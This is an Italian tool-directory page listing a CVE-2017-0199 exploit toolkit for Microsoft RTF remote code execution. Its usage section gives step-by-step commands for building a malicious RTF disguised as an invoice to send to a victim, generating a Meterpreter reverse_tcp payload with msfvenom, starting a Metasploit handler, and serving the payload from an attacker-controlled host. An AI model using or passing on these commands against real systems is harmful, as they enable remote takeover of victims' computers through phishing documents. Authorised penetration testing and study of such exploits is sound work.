Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-0199 — Exploit toolkit CVE-2017-0199 - v2.0 è un pratico script Python che fornisce un modo rapido ed efficace per sfruttare la vulnerabilità RCE di Microsoft RTF. Può generare un file RTF dannoso e consegnare il payload di Metasploit / Meterpreter alla vittima senza alcuna configurazione complessa. | Kitploit
Strumenti/GitHubGitHub/n1shant-sinha/cve-2017-0199
Framework di ExploitGenerazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubn1shant-sinha/cve-2017-0199

CVE-2017-0199

Vedi Repository
2429 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Exploit toolkit CVE-2017-0199 - v2.0 è un pratico script Python che fornisce un modo rapido ed efficace per sfruttare la vulnerabilità RCE di Microsoft RTF. Può generare un file RTF dannoso e consegnare il payload di Metasploit / Meterpreter alla vittima senza alcuna configurazione complessa.

Condividi

CVE-2017-0199

Exploit toolkit CVE-2017-0199 - v2.0 è un pratico script Python che fornisce un modo rapido ed efficace per sfruttare la vulnerabilità RCE di Microsoft RTF. Può generare un file RTF dannoso e consegnare il payload metasploit / meterpreter alla vittima senza alcuna configurazione complessa.

Note di rilascio:

Sono state introdotte le seguenti funzionalità nello script

  • Generare un file RTF dannoso usando il toolkit
  • Eseguire il toolkit in modalità exploitation come mini HTA + server Web Versione: Python 2.7.13

Esempio:

Passo 1: Generare il file RTF dannoso usando il seguente comando e inviarlo alla vittima

Sintassi:

python cve-2017-0199_toolkit.py -M gen -w <filename.rtf> -u http://attacker.com/test.hta

Esempio:

python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.133.128/logo.doc

Passo 2 (Opzionale, se si usa MSF Payload) : Generare il payload metasploit e avviare l'handler

Esempio:

Generare il payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe

Avviare l'handler:

msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.133.128; run"

Passo 3: Avviare il toolkit in modalità exploitation per consegnare i payload

Sintassi:

python cve-2017-0199_toolkit.py -M exp -e http://attacker.com/shell.exe -l </tmp/shell.exe>

Esempio:

python cve-2017-0199_toolkit.py -M exp -e http://192.168.133.128/shell.exe -l /tmp/shell.exe

Scarica lo strumento